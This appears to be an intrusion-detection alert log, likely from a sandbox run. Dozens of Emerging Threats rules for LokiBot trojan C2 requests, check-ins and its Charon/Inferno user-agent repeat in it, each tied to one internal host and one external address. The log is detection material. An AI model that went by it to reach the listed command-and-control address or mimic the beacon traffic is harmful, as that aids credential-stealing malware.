                                11/22/21-15:34:31.933523TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017680192.168.11.20192.185.217.246
                                11/22/21-15:34:32.760868TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017780192.168.11.20192.185.217.246
                                11/22/21-15:34:32.760868TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017780192.168.11.20192.185.217.246
                                11/22/21-15:34:32.760868TCP2025381ET TROJAN LokiBot Checkin5017780192.168.11.20192.185.217.246
                                11/22/21-15:34:32.760868TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017780192.168.11.20192.185.217.246
                                11/22/21-15:34:33.569782TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017880192.168.11.20192.185.217.246
                                11/22/21-15:34:33.569782TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017880192.168.11.20192.185.217.246
                                11/22/21-15:34:33.569782TCP2025381ET TROJAN LokiBot Checkin5017880192.168.11.20192.185.217.246
                                11/22/21-15:34:33.569782TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017880192.168.11.20192.185.217.246
                                11/22/21-15:34:34.443644TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15017980192.168.11.20192.185.217.246
                                11/22/21-15:34:34.443644TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5017980192.168.11.20192.185.217.246
                                11/22/21-15:34:34.443644TCP2025381ET TROJAN LokiBot Checkin5017980192.168.11.20192.185.217.246
                                11/22/21-15:34:34.443644TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25017980192.168.11.20192.185.217.246
                                11/22/21-15:34:35.187605TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018080192.168.11.20192.185.217.246
                                11/22/21-15:34:35.187605TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018080192.168.11.20192.185.217.246
                                11/22/21-15:34:35.187605TCP2025381ET TROJAN LokiBot Checkin5018080192.168.11.20192.185.217.246
                                11/22/21-15:34:35.187605TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018080192.168.11.20192.185.217.246
                                11/22/21-15:34:36.050220TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018180192.168.11.20192.185.217.246
                                11/22/21-15:34:36.050220TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018180192.168.11.20192.185.217.246
                                11/22/21-15:34:36.050220TCP2025381ET TROJAN LokiBot Checkin5018180192.168.11.20192.185.217.246
                                11/22/21-15:34:36.050220TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018180192.168.11.20192.185.217.246
                                11/22/21-15:34:36.873262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018280192.168.11.20192.185.217.246
                                11/22/21-15:34:36.873262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018280192.168.11.20192.185.217.246
                                11/22/21-15:34:36.873262TCP2025381ET TROJAN LokiBot Checkin5018280192.168.11.20192.185.217.246
                                11/22/21-15:34:36.873262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018280192.168.11.20192.185.217.246
                                11/22/21-15:34:37.601982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018380192.168.11.20192.185.217.246
                                11/22/21-15:34:37.601982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018380192.168.11.20192.185.217.246
                                11/22/21-15:34:37.601982TCP2025381ET TROJAN LokiBot Checkin5018380192.168.11.20192.185.217.246
                                11/22/21-15:34:37.601982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018380192.168.11.20192.185.217.246
                                11/22/21-15:34:38.490001TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018480192.168.11.20192.185.217.246
                                11/22/21-15:34:38.490001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018480192.168.11.20192.185.217.246
                                11/22/21-15:34:38.490001TCP2025381ET TROJAN LokiBot Checkin5018480192.168.11.20192.185.217.246
                                11/22/21-15:34:38.490001TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018480192.168.11.20192.185.217.246
                                11/22/21-15:34:39.337325TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018580192.168.11.20192.185.217.246
                                11/22/21-15:34:39.337325TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018580192.168.11.20192.185.217.246
                                11/22/21-15:34:39.337325TCP2025381ET TROJAN LokiBot Checkin5018580192.168.11.20192.185.217.246
                                11/22/21-15:34:39.337325TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018580192.168.11.20192.185.217.246
                                11/22/21-15:34:40.168259TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018680192.168.11.20192.185.217.246
                                11/22/21-15:34:40.168259TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018680192.168.11.20192.185.217.246
                                11/22/21-15:34:40.168259TCP2025381ET TROJAN LokiBot Checkin5018680192.168.11.20192.185.217.246
                                11/22/21-15:34:40.168259TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018680192.168.11.20192.185.217.246
                                11/22/21-15:34:41.010019TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018780192.168.11.20192.185.217.246
                                11/22/21-15:34:41.010019TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018780192.168.11.20192.185.217.246
                                11/22/21-15:34:41.010019TCP2025381ET TROJAN LokiBot Checkin5018780192.168.11.20192.185.217.246
                                11/22/21-15:34:41.010019TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018780192.168.11.20192.185.217.246
                                11/22/21-15:34:41.902626TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018880192.168.11.20192.185.217.246
                                11/22/21-15:34:41.902626TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018880192.168.11.20192.185.217.246
                                11/22/21-15:34:41.902626TCP2025381ET TROJAN LokiBot Checkin5018880192.168.11.20192.185.217.246
                                11/22/21-15:34:41.902626TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018880192.168.11.20192.185.217.246
                                11/22/21-15:34:42.739232TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15018980192.168.11.20192.185.217.246
                                11/22/21-15:34:42.739232TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5018980192.168.11.20192.185.217.246
                                11/22/21-15:34:42.739232TCP2025381ET TROJAN LokiBot Checkin5018980192.168.11.20192.185.217.246
                                11/22/21-15:34:42.739232TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25018980192.168.11.20192.185.217.246
                                11/22/21-15:34:43.538840TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019080192.168.11.20192.185.217.246
                                11/22/21-15:34:43.538840TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019080192.168.11.20192.185.217.246
                                11/22/21-15:34:43.538840TCP2025381ET TROJAN LokiBot Checkin5019080192.168.11.20192.185.217.246
                                11/22/21-15:34:43.538840TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019080192.168.11.20192.185.217.246
                                11/22/21-15:34:44.423097TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019180192.168.11.20192.185.217.246
                                11/22/21-15:34:44.423097TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019180192.168.11.20192.185.217.246
                                11/22/21-15:34:44.423097TCP2025381ET TROJAN LokiBot Checkin5019180192.168.11.20192.185.217.246
                                11/22/21-15:34:44.423097TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019180192.168.11.20192.185.217.246
                                11/22/21-15:34:45.255655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019280192.168.11.20192.185.217.246
                                11/22/21-15:34:45.255655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019280192.168.11.20192.185.217.246
                                11/22/21-15:34:45.255655TCP2025381ET TROJAN LokiBot Checkin5019280192.168.11.20192.185.217.246
                                11/22/21-15:34:45.255655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019280192.168.11.20192.185.217.246
                                11/22/21-15:34:46.077938TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019380192.168.11.20192.185.217.246
                                11/22/21-15:34:46.077938TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019380192.168.11.20192.185.217.246
                                11/22/21-15:34:46.077938TCP2025381ET TROJAN LokiBot Checkin5019380192.168.11.20192.185.217.246
                                11/22/21-15:34:46.077938TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019380192.168.11.20192.185.217.246
                                11/22/21-15:34:46.913603TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019480192.168.11.20192.185.217.246
                                11/22/21-15:34:46.913603TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019480192.168.11.20192.185.217.246
                                11/22/21-15:34:46.913603TCP2025381ET TROJAN LokiBot Checkin5019480192.168.11.20192.185.217.246
                                11/22/21-15:34:46.913603TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019480192.168.11.20192.185.217.246
                                11/22/21-15:34:47.742687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019580192.168.11.20192.185.217.246
                                11/22/21-15:34:47.742687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019580192.168.11.20192.185.217.246
                                11/22/21-15:34:47.742687TCP2025381ET TROJAN LokiBot Checkin5019580192.168.11.20192.185.217.246
                                11/22/21-15:34:47.742687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019580192.168.11.20192.185.217.246
                                11/22/21-15:34:48.548499TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019680192.168.11.20192.185.217.246
                                11/22/21-15:34:48.548499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019680192.168.11.20192.185.217.246
                                11/22/21-15:34:48.548499TCP2025381ET TROJAN LokiBot Checkin5019680192.168.11.20192.185.217.246
                                11/22/21-15:34:48.548499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019680192.168.11.20192.185.217.246
                                11/22/21-15:34:49.373258TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019780192.168.11.20192.185.217.246
                                11/22/21-15:34:49.373258TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019780192.168.11.20192.185.217.246
                                11/22/21-15:34:49.373258TCP2025381ET TROJAN LokiBot Checkin5019780192.168.11.20192.185.217.246
                                11/22/21-15:34:49.373258TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019780192.168.11.20192.185.217.246
                                11/22/21-15:34:50.141786TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019880192.168.11.20192.185.217.246
                                11/22/21-15:34:50.141786TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019880192.168.11.20192.185.217.246
                                11/22/21-15:34:50.141786TCP2025381ET TROJAN LokiBot Checkin5019880192.168.11.20192.185.217.246
                                11/22/21-15:34:50.141786TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019880192.168.11.20192.185.217.246
                                11/22/21-15:34:50.996912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15019980192.168.11.20192.185.217.246
                                11/22/21-15:34:50.996912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5019980192.168.11.20192.185.217.246
                                11/22/21-15:34:50.996912TCP2025381ET TROJAN LokiBot Checkin5019980192.168.11.20192.185.217.246
                                11/22/21-15:34:50.996912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25019980192.168.11.20192.185.217.246
                                11/22/21-15:34:51.730447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020080192.168.11.20192.185.217.246
                                11/22/21-15:34:51.730447TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020080192.168.11.20192.185.217.246
                                11/22/21-15:34:51.730447TCP2025381ET TROJAN LokiBot Checkin5020080192.168.11.20192.185.217.246
                                11/22/21-15:34:51.730447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020080192.168.11.20192.185.217.246
                                11/22/21-15:34:52.536692TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020180192.168.11.20192.185.217.246
                                11/22/21-15:34:52.536692TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020180192.168.11.20192.185.217.246
                                11/22/21-15:34:52.536692TCP2025381ET TROJAN LokiBot Checkin5020180192.168.11.20192.185.217.246
                                11/22/21-15:34:52.536692TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020180192.168.11.20192.185.217.246
                                11/22/21-15:34:53.384296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020280192.168.11.20192.185.217.246
                                11/22/21-15:34:53.384296TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020280192.168.11.20192.185.217.246
                                11/22/21-15:34:53.384296TCP2025381ET TROJAN LokiBot Checkin5020280192.168.11.20192.185.217.246
                                11/22/21-15:34:53.384296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020280192.168.11.20192.185.217.246
                                11/22/21-15:34:54.198128TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020380192.168.11.20192.185.217.246
                                11/22/21-15:34:54.198128TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020380192.168.11.20192.185.217.246
                                11/22/21-15:34:54.198128TCP2025381ET TROJAN LokiBot Checkin5020380192.168.11.20192.185.217.246
                                11/22/21-15:34:54.198128TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020380192.168.11.20192.185.217.246
                                11/22/21-15:34:55.016944TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020480192.168.11.20192.185.217.246
                                11/22/21-15:34:55.016944TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020480192.168.11.20192.185.217.246
                                11/22/21-15:34:55.016944TCP2025381ET TROJAN LokiBot Checkin5020480192.168.11.20192.185.217.246
                                11/22/21-15:34:55.016944TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020480192.168.11.20192.185.217.246
                                11/22/21-15:34:55.785855TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020580192.168.11.20192.185.217.246
                                11/22/21-15:34:55.785855TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020580192.168.11.20192.185.217.246
                                11/22/21-15:34:55.785855TCP2025381ET TROJAN LokiBot Checkin5020580192.168.11.20192.185.217.246
                                11/22/21-15:34:55.785855TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020580192.168.11.20192.185.217.246
                                11/22/21-15:34:56.584631TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020680192.168.11.20192.185.217.246
                                11/22/21-15:34:56.584631TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020680192.168.11.20192.185.217.246
                                11/22/21-15:34:56.584631TCP2025381ET TROJAN LokiBot Checkin5020680192.168.11.20192.185.217.246
                                11/22/21-15:34:56.584631TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020680192.168.11.20192.185.217.246
                                11/22/21-15:34:57.389990TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020780192.168.11.20192.185.217.246
                                11/22/21-15:34:57.389990TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020780192.168.11.20192.185.217.246
                                11/22/21-15:34:57.389990TCP2025381ET TROJAN LokiBot Checkin5020780192.168.11.20192.185.217.246
                                11/22/21-15:34:57.389990TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020780192.168.11.20192.185.217.246
                                11/22/21-15:34:58.267309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020880192.168.11.20192.185.217.246
                                11/22/21-15:34:58.267309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020880192.168.11.20192.185.217.246
                                11/22/21-15:34:58.267309TCP2025381ET TROJAN LokiBot Checkin5020880192.168.11.20192.185.217.246
                                11/22/21-15:34:58.267309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020880192.168.11.20192.185.217.246
                                11/22/21-15:34:59.047304TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15020980192.168.11.20192.185.217.246
                                11/22/21-15:34:59.047304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5020980192.168.11.20192.185.217.246
                                11/22/21-15:34:59.047304TCP2025381ET TROJAN LokiBot Checkin5020980192.168.11.20192.185.217.246
                                11/22/21-15:34:59.047304TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25020980192.168.11.20192.185.217.246
                                11/22/21-15:34:59.861563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021080192.168.11.20192.185.217.246
                                11/22/21-15:34:59.861563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021080192.168.11.20192.185.217.246
                                11/22/21-15:34:59.861563TCP2025381ET TROJAN LokiBot Checkin5021080192.168.11.20192.185.217.246
                                11/22/21-15:34:59.861563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021080192.168.11.20192.185.217.246
                                11/22/21-15:35:00.702806TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021180192.168.11.20192.185.217.246
                                11/22/21-15:35:00.702806TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021180192.168.11.20192.185.217.246
                                11/22/21-15:35:00.702806TCP2025381ET TROJAN LokiBot Checkin5021180192.168.11.20192.185.217.246
                                11/22/21-15:35:00.702806TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021180192.168.11.20192.185.217.246
                                11/22/21-15:35:01.569892TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021280192.168.11.20192.185.217.246
                                11/22/21-15:35:01.569892TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021280192.168.11.20192.185.217.246
                                11/22/21-15:35:01.569892TCP2025381ET TROJAN LokiBot Checkin5021280192.168.11.20192.185.217.246
                                11/22/21-15:35:01.569892TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021280192.168.11.20192.185.217.246
                                11/22/21-15:35:02.493138TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021380192.168.11.20192.185.217.246
                                11/22/21-15:35:02.493138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021380192.168.11.20192.185.217.246
                                11/22/21-15:35:02.493138TCP2025381ET TROJAN LokiBot Checkin5021380192.168.11.20192.185.217.246
                                11/22/21-15:35:02.493138TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021380192.168.11.20192.185.217.246
                                11/22/21-15:35:03.298825TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021480192.168.11.20192.185.217.246
                                11/22/21-15:35:03.298825TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021480192.168.11.20192.185.217.246
                                11/22/21-15:35:03.298825TCP2025381ET TROJAN LokiBot Checkin5021480192.168.11.20192.185.217.246
                                11/22/21-15:35:03.298825TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021480192.168.11.20192.185.217.246
                                11/22/21-15:35:04.305554TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021580192.168.11.20192.185.217.246
                                11/22/21-15:35:04.305554TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021580192.168.11.20192.185.217.246
                                11/22/21-15:35:04.305554TCP2025381ET TROJAN LokiBot Checkin5021580192.168.11.20192.185.217.246
                                11/22/21-15:35:04.305554TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021580192.168.11.20192.185.217.246
                                11/22/21-15:35:05.151660TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021680192.168.11.20192.185.217.246
                                11/22/21-15:35:05.151660TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021680192.168.11.20192.185.217.246
                                11/22/21-15:35:05.151660TCP2025381ET TROJAN LokiBot Checkin5021680192.168.11.20192.185.217.246
                                11/22/21-15:35:05.151660TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021680192.168.11.20192.185.217.246
                                11/22/21-15:35:05.915700TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021780192.168.11.20192.185.217.246
                                11/22/21-15:35:05.915700TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021780192.168.11.20192.185.217.246
                                11/22/21-15:35:05.915700TCP2025381ET TROJAN LokiBot Checkin5021780192.168.11.20192.185.217.246
                                11/22/21-15:35:05.915700TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021780192.168.11.20192.185.217.246
                                11/22/21-15:35:06.713261TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021880192.168.11.20192.185.217.246
                                11/22/21-15:35:06.713261TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021880192.168.11.20192.185.217.246
                                11/22/21-15:35:06.713261TCP2025381ET TROJAN LokiBot Checkin5021880192.168.11.20192.185.217.246
                                11/22/21-15:35:06.713261TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021880192.168.11.20192.185.217.246
                                11/22/21-15:35:07.580082TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15021980192.168.11.20192.185.217.246
                                11/22/21-15:35:07.580082TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5021980192.168.11.20192.185.217.246
                                11/22/21-15:35:07.580082TCP2025381ET TROJAN LokiBot Checkin5021980192.168.11.20192.185.217.246
                                11/22/21-15:35:07.580082TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25021980192.168.11.20192.185.217.246
                                11/22/21-15:35:08.312024TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022080192.168.11.20192.185.217.246
                                11/22/21-15:35:08.312024TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022080192.168.11.20192.185.217.246
                                11/22/21-15:35:08.312024TCP2025381ET TROJAN LokiBot Checkin5022080192.168.11.20192.185.217.246
                                11/22/21-15:35:08.312024TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022080192.168.11.20192.185.217.246
                                11/22/21-15:35:09.116161TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022180192.168.11.20192.185.217.246
                                11/22/21-15:35:09.116161TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022180192.168.11.20192.185.217.246
                                11/22/21-15:35:09.116161TCP2025381ET TROJAN LokiBot Checkin5022180192.168.11.20192.185.217.246
                                11/22/21-15:35:09.116161TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022180192.168.11.20192.185.217.246
                                11/22/21-15:35:09.947240TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022280192.168.11.20192.185.217.246
                                11/22/21-15:35:09.947240TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022280192.168.11.20192.185.217.246
                                11/22/21-15:35:09.947240TCP2025381ET TROJAN LokiBot Checkin5022280192.168.11.20192.185.217.246
                                11/22/21-15:35:09.947240TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022280192.168.11.20192.185.217.246
                                11/22/21-15:35:10.776339TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022380192.168.11.20192.185.217.246
                                11/22/21-15:35:10.776339TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022380192.168.11.20192.185.217.246
                                11/22/21-15:35:10.776339TCP2025381ET TROJAN LokiBot Checkin5022380192.168.11.20192.185.217.246
                                11/22/21-15:35:10.776339TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022380192.168.11.20192.185.217.246
                                11/22/21-15:35:11.582677TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022480192.168.11.20192.185.217.246
                                11/22/21-15:35:11.582677TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022480192.168.11.20192.185.217.246
                                11/22/21-15:35:11.582677TCP2025381ET TROJAN LokiBot Checkin5022480192.168.11.20192.185.217.246
                                11/22/21-15:35:11.582677TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022480192.168.11.20192.185.217.246
                                11/22/21-15:35:12.417814TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022580192.168.11.20192.185.217.246
                                11/22/21-15:35:12.417814TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022580192.168.11.20192.185.217.246
                                11/22/21-15:35:12.417814TCP2025381ET TROJAN LokiBot Checkin5022580192.168.11.20192.185.217.246
                                11/22/21-15:35:12.417814TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022580192.168.11.20192.185.217.246
                                11/22/21-15:35:13.245087TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022680192.168.11.20192.185.217.246
                                11/22/21-15:35:13.245087TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022680192.168.11.20192.185.217.246
                                11/22/21-15:35:13.245087TCP2025381ET TROJAN LokiBot Checkin5022680192.168.11.20192.185.217.246
                                11/22/21-15:35:13.245087TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022680192.168.11.20192.185.217.246
                                11/22/21-15:35:13.987183TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022780192.168.11.20192.185.217.246
                                11/22/21-15:35:13.987183TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022780192.168.11.20192.185.217.246
                                11/22/21-15:35:13.987183TCP2025381ET TROJAN LokiBot Checkin5022780192.168.11.20192.185.217.246
                                11/22/21-15:35:13.987183TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022780192.168.11.20192.185.217.246
                                11/22/21-15:35:14.888390TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022880192.168.11.20192.185.217.246
                                11/22/21-15:35:14.888390TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022880192.168.11.20192.185.217.246
                                11/22/21-15:35:14.888390TCP2025381ET TROJAN LokiBot Checkin5022880192.168.11.20192.185.217.246
                                11/22/21-15:35:14.888390TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022880192.168.11.20192.185.217.246
                                11/22/21-15:35:15.739125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15022980192.168.11.20192.185.217.246
                                11/22/21-15:35:15.739125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5022980192.168.11.20192.185.217.246
                                11/22/21-15:35:15.739125TCP2025381ET TROJAN LokiBot Checkin5022980192.168.11.20192.185.217.246
                                11/22/21-15:35:15.739125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25022980192.168.11.20192.185.217.246
                                11/22/21-15:35:16.560301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023080192.168.11.20192.185.217.246
                                11/22/21-15:35:16.560301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023080192.168.11.20192.185.217.246
                                11/22/21-15:35:16.560301TCP2025381ET TROJAN LokiBot Checkin5023080192.168.11.20192.185.217.246
                                11/22/21-15:35:16.560301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023080192.168.11.20192.185.217.246
                                11/22/21-15:35:17.390982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023180192.168.11.20192.185.217.246
                                11/22/21-15:35:17.390982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023180192.168.11.20192.185.217.246
                                11/22/21-15:35:17.390982TCP2025381ET TROJAN LokiBot Checkin5023180192.168.11.20192.185.217.246
                                11/22/21-15:35:17.390982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023180192.168.11.20192.185.217.246
                                11/22/21-15:35:18.210309TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023280192.168.11.20192.185.217.246
                                11/22/21-15:35:18.210309TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023280192.168.11.20192.185.217.246
                                11/22/21-15:35:18.210309TCP2025381ET TROJAN LokiBot Checkin5023280192.168.11.20192.185.217.246
                                11/22/21-15:35:18.210309TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023280192.168.11.20192.185.217.246
                                11/22/21-15:35:19.046559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023380192.168.11.20192.185.217.246
                                11/22/21-15:35:19.046559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023380192.168.11.20192.185.217.246
                                11/22/21-15:35:19.046559TCP2025381ET TROJAN LokiBot Checkin5023380192.168.11.20192.185.217.246
                                11/22/21-15:35:19.046559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023380192.168.11.20192.185.217.246
                                11/22/21-15:35:19.904432TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023480192.168.11.20192.185.217.246
                                11/22/21-15:35:19.904432TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023480192.168.11.20192.185.217.246
                                11/22/21-15:35:19.904432TCP2025381ET TROJAN LokiBot Checkin5023480192.168.11.20192.185.217.246
                                11/22/21-15:35:19.904432TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023480192.168.11.20192.185.217.246
                                11/22/21-15:35:20.763702TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15023580192.168.11.20192.185.217.246
                                11/22/21-15:35:20.763702TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5023580192.168.11.20192.185.217.246
                                11/22/21-15:35:20.763702TCP2025381ET TROJAN LokiBot Checkin5023580192.168.11.20192.185.217.246
                                11/22/21-15:35:20.763702TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25023580192.168.11.20192.185.217.246
